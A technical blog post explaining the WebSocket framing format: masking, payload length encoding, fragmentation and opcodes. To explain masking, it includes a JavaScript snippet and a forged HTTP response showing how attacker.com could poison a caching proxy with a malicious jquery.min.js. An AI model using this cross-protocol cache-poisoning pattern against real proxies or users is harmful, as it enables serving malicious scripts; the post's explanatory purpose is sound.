WebSockets are great: they provide a persistent two-way communication channel over a single TCP connection. They allow for real-time data exchange so they're used in chat, collaborative tools, and some AI APIs, among other things.
I recently wrote a WebSocket parser for Subtrace, and was surprised at how simple the (base) protocol is. The RFC felt almost... readable. The message format does just what it needs to do, and no more.
If you just want to play around with a WebSocket encoder, there's one at the bottom of the page.
WebSocket communication is built on a simple structure: both sides of the connection exchange messages, and each message is made up of one or more frames. Let's start by assuming messages are just single frames, and we'll build from there.
Here's a simple (but valid!) WebSocket message that says "Hello":
Ignoring the header byte (we'll get to it later), this is literally just the message length (5) followed by the payload ("Hello" in UTF-8). Simple, right?
Okay, the full story is a bit more than that.
A WebSocket client MUST mask (scramble) all the messages it sends to the server. If you're like me and you're wondering how "client" and "server" apply to WebSockets- the client initiates the connection with an HTTP request, and the server responds with a 101 Switching Protocols before upgrading to WebSocket.
Masking requires a 4 byte masking key, so let's use a1 b2 c3 d4. Here's what our "Hello" message looks like now:
The masked payload is obtained by XORing the original payload "Hello" with the masking key one byte at a time, repeating the masking key as necessary.
It's a bit kludgy, but it was a safety measure against cross-protocol attacks back when WebSockets were relatively new.
Imagine attacker.com opens a WebSocket connection on the browser to its own server. It then sends a WebSocket message that looks like a HTTP GET request:
// on the user's browser
const socket = new WebSocket("ws://attacker.com");
socket.onopen = () => socket.send(
"GET /jquery.min.js HTTP/1.1\r\n" +
"Host: cdn.jquery.com\r\n" +
"User-Agent: Mozilla/5.0\r\n" +
"Accept: */*\r\n" +
"Connection: keep-alive\r\n\r\n"
);
If there's no masking, these bytes are sent verbatim over the wire by the browser. If there's a caching proxy that doesn't parse websocket traffic correctly, it treats this as a legitimate HTTP request.
Now attacker.com sends back a websocket message that looks like a HTTP response:
HTTP/1.1 200 OK
Content-Type: application/javascript
Content-Length: 1337
Cache-Control: public, max-age=86400
alert('pwned');
The proxy caches this since it looks like a valid HTTP response. The next time a user requests cdn.jquery.com/jquery.min.js, they are served the malicious version from the cache.
To prevent this, each client → server frame is masked with a different randomly generated key. This prevents HTTP proxies from accidentally intepreting these bytes as anything else.
That being said, masking is less critical than it used to be:
(Note that server → client frames aren't masked - this risk only exists in browser-initiated traffic. In fact server → client frames MUST NOT be masked.)
Notice that the second byte went from 05 to 85 even though the length of the message hasn't changed. It turns out the most significant bit (MSB) of this byte tells us whether the payload is masked. The remaining 7 bits give us the payload length.
Well, kind of.
Using 7 bits for the payload length allows us to specify a payload that's at most 127 bytes. What if we need more than that?
Let's call that 7-bit integer val (so the full byte is mask+val). Depending on what val is, there are different ways to represent the payload length:
This means you could technically encode a 263-1 byte (9.2 exabyte) message in one single frame. But you'll pretty much never see such large messages in practice, since most WebSocket libraries buffer entire messages in memory. Besides, there are other ways to encode long messages.
As mentioned earlier, WebSocket messages can span multiple frames. When that happens, the individual payloads from each frame are concatenated to get the complete message. For example, if a WebSocket client receives these two frames in this order:
The client reads a single message "Hello world!". This also works with masked frames- just unmask before concatenating.
If a message can have multiple frames, what dictates its boundaries? It's finally time to talk about that header byte. Let's look at the structure of the header, using the headers from the two frames above as examples:
FIN: If set, this is the final frame in a message. This is how message boundaries are determined.
RSV1, RSV2, RSV3: These three bits are "reserved." They're all 0 in most normal WebSocket traffic. We'll ignore these for now but maybe return to them another day when we talk about compression.
Opcode: These 4 bits tell us what kind of frame this is.
0000
: Continuation - continues a fragmented message started by
a previous frame.0001
: Text - carries UTF-8 encoded text data.0010
: Binary - carries arbitrary binary data; interpretation
is left to the
application.1000
: Close - initiates a connection shutdown and may include
a status code and reason.
1001
: Ping - checks if the connection is alive. Can be sent at
any time, even in the middle of a fragmented message.1010
: Pong - replies to a ping. Like ping, it can appear between frames of a fragmented
message.And that's (almost) all there is to it! There's more to talk about like compression and how a WebSocket connection is even established, but we'll leave those for another time.
Generate your own WebSocket frames. Tap or hover over each set of bytes to see what they represent.
Note: I didn't cover compression here, but you can toggle it below to see how it affects things. As you might expect, it's most effective on compressible payloads like repeated strings.